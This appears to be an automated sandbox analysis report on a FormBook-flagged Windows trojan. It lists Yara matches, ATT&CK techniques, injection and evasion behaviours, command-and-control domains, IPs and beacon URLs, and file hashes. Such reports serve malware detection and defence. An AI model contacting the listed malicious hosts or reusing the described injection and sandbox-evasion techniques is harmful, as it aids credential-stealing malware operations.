          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1Command and Scripting Interpreter2Valid Accounts1Valid Accounts1Rootkit1Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsNative API1Boot or Logon Initialization ScriptsAccess Token Manipulation1Valid Accounts1LSASS MemorySecurity Software Discovery151Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Process Injection512Access Token Manipulation1Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncSystem Information Discovery124Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 339369 Sample: RRW9901200241.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 34 www.monkeytrivia.com 2->34 38 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 6 other signatures 2->44 11 RRW9901200241.exe 2->11         started        signatures3 process4 signatures5 52 Maps a DLL or memory area into another process 11->52 54 Tries to detect virtualization through RDTSC time measurements 11->54 14 RRW9901200241.exe 11->14         started        process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 14->56 58 Maps a DLL or memory area into another process 14->58 60 Sample uses process hollowing technique 14->60 62 Queues an APC in another process (thread injection) 14->62 17 explorer.exe 14->17 injected process8 dnsIp9 28 www.unitvn.com 112.213.89.130, 49755, 80 SUPERDATA-AS-VNSUPERDATA-VN Viet Nam 17->28 30 www.toastxpress.com 161.35.25.247, 49748, 80 DIGITALOCEAN-ASNUS United States 17->30 32 5 other IPs or domains 17->32 36 System process connects to network (likely due to code injection or exploit) 17->36 21 cmd.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          RRW9901200241.exe35%ReversingLabsWin32.Trojan.Pwsx
          RRW9901200241.exe100%AviraHEUR/AGEN.1106536
          RRW9901200241.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.RRW9901200241.exe.1a00000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.RRW9901200241.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          7852bigbucktrail.info5%VirustotalBrowse
          www.unitvn.com4%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.7852bigbucktrail.info/krc/?Bv=CDu2q1wwlPol/aaE7LTgnX8K53P3sg99O/jiiFC4V2fCANwRdAJcp+ZFqaBz9HB2y9P2V6qKww==&J494p=ARALpBVpxtEXKvT00%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.unitvn.com/krc/?Bv=yIa+94l9rzehTYM3PiVfcRiVsqTAPcUdvzwZbg1xcjwMDM0Vsi/KUjipuHGUDzRPALJr1HG4xA==&J494p=ARALpBVpxtEXKvT0100%Avira URL Cloudmalware
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          7852bigbucktrail.info
          18.209.115.26
          truetrueunknown
          www.toastxpress.com
          161.35.25.247
          truetrue
            unknown
            www.unitvn.com
            112.213.89.130
            truetrueunknown
            www.monkeytrivia.com
            156.238.82.35
            truefalse
              unknown
              www.grayfoxden.com
              unknown
              unknowntrue
                unknown
                www.7852bigbucktrail.info
                unknown
                unknowntrue
                  unknown
                  www.catatan-matematika.com
                  unknown
                  unknowntrue
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.7852bigbucktrail.info/krc/?Bv=CDu2q1wwlPol/aaE7LTgnX8K53P3sg99O/jiiFC4V2fCANwRdAJcp+ZFqaBz9HB2y9P2V6qKww==&J494p=ARALpBVpxtEXKvT0true
                    • Avira URL Cloud: safe
                    unknown
                    http://www.unitvn.com/krc/?Bv=yIa+94l9rzehTYM3PiVfcRiVsqTAPcUdvzwZbg1xcjwMDM0Vsi/KUjipuHGUDzRPALJr1HG4xA==&J494p=ARALpBVpxtEXKvT0true
                    • Avira URL Cloud: malware
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.346593091.000000000095C000.00000004.00000020.sdmpfalse
                      high
                      http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                        high
                        http://www.fontbureau.comexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                          high
                          http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                            high
                            http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                              high
                              http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                high
                                http://www.litespeedtech.com/error-pagecmd.exe, 00000004.00000002.679859333.0000000003A2F000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.tiro.comexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.goodfont.co.krexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.carterandcone.comlexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.typography.netDexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://fontfabrik.comexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.fonts.comexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.sandoll.co.krexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sakkal.comexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            112.213.89.130
                                            unknownViet Nam
                                            45544SUPERDATA-AS-VNSUPERDATA-VNtrue
                                            161.35.25.247
                                            unknownUnited States
                                            14061DIGITALOCEAN-ASNUStrue
                                            18.209.115.26
                                            unknownUnited States
                                            14618AMAZON-AESUStrue

                                            Private

                                            IP
                                            192.168.2.1

                                            General Information

                                            Joe Sandbox Version:31.0.0 Red Diamond
                                            Analysis ID:339369
                                            Start date:13.01.2021
                                            Start time:21:45:49
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 10m 8s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:RRW9901200241.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:21
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@7/0@6/4
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 14.3% (good quality ratio 13.4%)
                                            • Quality average: 74.7%
                                            • Quality standard deviation: 29.2%
                                            HCA Information:
                                            • Successful, ratio: 96%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                            • Excluded IPs from analysis (whitelisted): 40.88.32.150, 13.88.21.125, 104.43.139.144, 51.104.144.132, 92.122.213.247, 92.122.213.194, 8.248.149.254, 8.253.95.249, 8.253.204.121, 67.26.75.254, 67.26.137.254, 51.103.5.159, 52.155.217.156, 20.54.26.129, 23.210.248.85, 51.104.139.180, 173.194.79.121
                                            • Excluded domains from analysis (whitelisted): ghs.google.com, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net

                                            Simulations

                                            Behavior and APIs

                                            No simulations

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            112.213.89.130RTV900021234.exeGet hashmaliciousBrowse
                                            • www.unitvn.com/krc/?APX87P=yIa+94l9rzehTYM3PiVfcRiVsqTAPcUdvzwZbg1xcjwMDM0Vsi/KUjipuEqEfCN0H+g6&LZiH=ypqh5Rq0KFKhz8cp
                                            18.209.115.26payment slip-002044040440.exeGet hashmaliciousBrowse
                                            • www.1250northdearbornst4c.info/2igt/?uR-l4=3NdSt4Dbtj7cU1//BbJElqvuZBmTz68+ScaJlk7V93PW9Am25GCoyfUNEI1BqDLJxCBl&IhQ0qf=9rUDXL508DA

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            www.unitvn.comRTV900021234.exeGet hashmaliciousBrowse
                                            • 112.213.89.130

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            SUPERDATA-AS-VNSUPERDATA-VNH56P7iDwnJ.docGet hashmaliciousBrowse
                                            • 112.213.89.42
                                            RTV900021234.exeGet hashmaliciousBrowse
                                            • 112.213.89.130
                                            sample.exeGet hashmaliciousBrowse
                                            • 112.213.89.101
                                            December Po034333.exeGet hashmaliciousBrowse
                                            • 45.117.169.19
                                            bin.exeGet hashmaliciousBrowse
                                            • 103.7.41.23
                                            New inquiry CMSalgmN0 200000872525_pdf.exeGet hashmaliciousBrowse
                                            • 103.252.254.111
                                            NOAH FORMBUK_crypted.exeGet hashmaliciousBrowse
                                            • 112.213.89.96
                                            Quotation.exeGet hashmaliciousBrowse
                                            • 112.213.89.38
                                            https://contentsxx.xsrv.jp/academia/parts_service/7xg/Get hashmaliciousBrowse
                                            • 112.213.89.144
                                            PAYMENT SWIFT COPY.exeGet hashmaliciousBrowse
                                            • 112.213.92.150
                                            REQUEST FOR QUOTATION FILE.exeGet hashmaliciousBrowse
                                            • 112.213.92.150
                                            IMG_000924677656765_0025676544.exeGet hashmaliciousBrowse
                                            • 112.213.92.150
                                            WIRE TRANSFER COPY _JPG_.exeGet hashmaliciousBrowse
                                            • 112.213.92.150
                                            WIRE REMITTANCE SLIP.exeGet hashmaliciousBrowse
                                            • 112.213.92.150
                                            PAYMENT SWIFT COPY.exeGet hashmaliciousBrowse
                                            • 112.213.92.150
                                            http://617pg.com/sites/pfCaonVGet hashmaliciousBrowse
                                            • 112.213.89.121
                                            New Order.exeGet hashmaliciousBrowse
                                            • 45.117.170.2
                                            PO# 08272020Ex.docGet hashmaliciousBrowse
                                            • 112.213.89.42
                                            Dokumente_2020_08.docGet hashmaliciousBrowse
                                            • 112.213.89.89
                                            I51QkD14Ap.docGet hashmaliciousBrowse
                                            • 112.213.89.143
                                            AMAZON-AESUSChrome.exeGet hashmaliciousBrowse
                                            • 3.83.71.222
                                            orden pdf.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            Matrix.exeGet hashmaliciousBrowse
                                            • 54.234.205.119
                                            YvGnm93rap.exeGet hashmaliciousBrowse
                                            • 54.208.77.124
                                            0113_1010932681.docGet hashmaliciousBrowse
                                            • 184.73.247.141
                                            0113_203089882.docGet hashmaliciousBrowse
                                            • 50.19.243.236
                                            0113_88514789.docGet hashmaliciousBrowse
                                            • 54.235.83.248
                                            W0rd.dllGet hashmaliciousBrowse
                                            • 23.21.140.41
                                            W0rd.dllGet hashmaliciousBrowse
                                            • 184.73.247.141
                                            Order_00009.xlsxGet hashmaliciousBrowse
                                            • 35.172.94.1
                                            PO85937758859777.xlsxGet hashmaliciousBrowse
                                            • 52.201.79.206
                                            IMG_2021_01_13_1_RFQ_PO_1832938.docGet hashmaliciousBrowse
                                            • 54.224.10.186
                                            0113_35727287.docGet hashmaliciousBrowse
                                            • 184.73.247.141
                                            W0rd.dllGet hashmaliciousBrowse
                                            • 54.243.119.179
                                            0fiasS.dllGet hashmaliciousBrowse
                                            • 54.243.119.179
                                            01_extracted.exeGet hashmaliciousBrowse
                                            • 184.73.247.141
                                            DHL_Jan 2021 at 1.M_9B78290_PDF.exeGet hashmaliciousBrowse
                                            • 23.21.252.4
                                            QUOTE_98876_566743_233.exeGet hashmaliciousBrowse
                                            • 52.20.197.7
                                            20210111 Virginie.exeGet hashmaliciousBrowse
                                            • 52.202.22.6
                                            DHL_Jan 2021 at 13M_9B7290_PDF.exeGet hashmaliciousBrowse
                                            • 54.243.164.148
                                            DIGITALOCEAN-ASNUSByrnes Gould PLLC.odtGet hashmaliciousBrowse
                                            • 178.128.131.91
                                            pHUWiFd56t.exeGet hashmaliciousBrowse
                                            • 107.170.138.56
                                            Project review_Pdf.exeGet hashmaliciousBrowse
                                            • 128.199.234.84
                                            Consignment Details.exeGet hashmaliciousBrowse
                                            • 161.35.147.117
                                            btVnDhh5K7.exeGet hashmaliciousBrowse
                                            • 167.71.226.205
                                            0XrD9TsGUr.exeGet hashmaliciousBrowse
                                            • 107.170.138.56
                                            RFQ 41680.xlsxGet hashmaliciousBrowse
                                            • 178.62.58.5
                                            Doc.docGet hashmaliciousBrowse
                                            • 178.128.68.22
                                            mobdro.apkGet hashmaliciousBrowse
                                            • 142.93.74.196
                                            mobdro.apkGet hashmaliciousBrowse
                                            • 142.93.74.196
                                            Test.HTMGet hashmaliciousBrowse
                                            • 159.89.4.250
                                            Doc.docGet hashmaliciousBrowse
                                            • 167.71.148.58
                                            Electronic form.docGet hashmaliciousBrowse
                                            • 157.245.123.197
                                            ______.docGet hashmaliciousBrowse
                                            • 188.166.207.182
                                            ______.docGet hashmaliciousBrowse
                                            • 188.166.207.182
                                            http://landerer.wellwayssaustralia.com/r/?id=kl522318,Z185223,I521823&rd=www.electriccollisionrepair.com/236:52%20PMt75252n2021?e=#landerer@doriltoncapital.comGet hashmaliciousBrowse
                                            • 5.101.110.225
                                            info.docGet hashmaliciousBrowse
                                            • 138.197.99.250
                                            JI35907_2020.docGet hashmaliciousBrowse
                                            • 178.128.68.22
                                            http://46.101.152.151/?email=michael.little@austalusa.comGet hashmaliciousBrowse
                                            • 46.101.152.151
                                            http://search.hwatchtvnow.coGet hashmaliciousBrowse
                                            • 82.196.7.246

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            No created / dropped files found

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.637869354827877
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:RRW9901200241.exe
                                            File size:333312
                                            MD5:61ffb4ad4721f51413075923b2e9468d
                                            SHA1:aa9ca98955157ca28bdbb1d8d29c3d1af2e28023
                                            SHA256:546e873e9e746eeee9cbed391ff7463ce192091ee0ff51c076291da5d836f64f
                                            SHA512:fe49b3771c704c8ab65cb7eb54e6a6e29abb96d0f6e2a9e1d3838d99370d2d868b51111a4ff5e04b181c1f12f42a296a56c5a1e3afb4fa05540ae632d592dbd7
                                            SSDEEP:6144:N19ayEbgUCAOTYANcqIW2yny6uvfb+OYITDbJZyA4JDh17ZST0b+caI:39ay0grp2yn16fb+OBXiDJ9VZGKcI
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........tj.m'j.m'j.m'.Q.'k.m'.4.'I.m'.4.'r.m'.4.'..m'j.l'..m'...'..m'M7.'k.m'M7.'k.m'M7.'k.m'Richj.m'................PE..L......_...

                                            File Icon

                                            Icon Hash:00828e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x408847
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x5FFEB19F [Wed Jan 13 08:38:55 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:6
                                            OS Version Minor:0
                                            File Version Major:6
                                            File Version Minor:0
                                            Subsystem Version Major:6
                                            Subsystem Version Minor:0
                                            Import Hash:e7da020c2fad0c59a3d5e97971484548

                                            Entrypoint Preview

                                            Instruction
                                            call 00007FE7ACDB62F1h
                                            jmp 00007FE7ACDAEF55h
                                            push 00000014h
                                            push 0041D838h
                                            call 00007FE7ACDAF7F8h
                                            call 00007FE7ACDB26A6h
                                            movzx esi, ax
                                            push 00000002h
                                            call 00007FE7ACDB6284h
                                            pop ecx
                                            mov eax, 00005A4Dh
                                            cmp word ptr [00400000h], ax
                                            je 00007FE7ACDAEF56h
                                            xor ebx, ebx
                                            jmp 00007FE7ACDAEF85h
                                            mov eax, dword ptr [0040003Ch]
                                            cmp dword ptr [eax+00400000h], 00004550h
                                            jne 00007FE7ACDAEF3Dh
                                            mov ecx, 0000010Bh
                                            cmp word ptr [eax+00400018h], cx
                                            jne 00007FE7ACDAEF2Fh
                                            xor ebx, ebx
                                            cmp dword ptr [eax+00400074h], 0Eh
                                            jbe 00007FE7ACDAEF5Bh
                                            cmp dword ptr [eax+004000E8h], ebx
                                            setne bl
                                            mov dword ptr [ebp-1Ch], ebx
                                            call 00007FE7ACDB3693h
                                            test eax, eax
                                            jne 00007FE7ACDAEF5Ah
                                            push 0000001Ch
                                            call 00007FE7ACDAF025h
                                            pop ecx
                                            call 00007FE7ACDB3CFCh
                                            test eax, eax
                                            jne 00007FE7ACDAEF5Ah
                                            push 00000010h
                                            call 00007FE7ACDAF014h
                                            pop ecx
                                            call 00007FE7ACDB2438h
                                            and dword ptr [ebp-04h], 00000000h
                                            call 00007FE7ACDB0BD3h
                                            call dword ptr [004180C8h]
                                            mov dword ptr [00424080h], eax
                                            call 00007FE7ACDB62E2h
                                            mov dword ptr [00422284h], eax
                                            call 00007FE7ACDB5EE3h
                                            test eax, eax
                                            jns 00007FE7ACDAEF5Ah
                                            push 00000008h
                                            call 00007FE7ACDADB0Ah
                                            pop ecx
                                            call 00007FE7ACDB60FFh

                                            Rich Headers

                                            Programming Language:
                                            • [LNK] VS2012 build 50727
                                            • [RES] VS2012 build 50727
                                            • [ C ] VS2012 build 50727

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
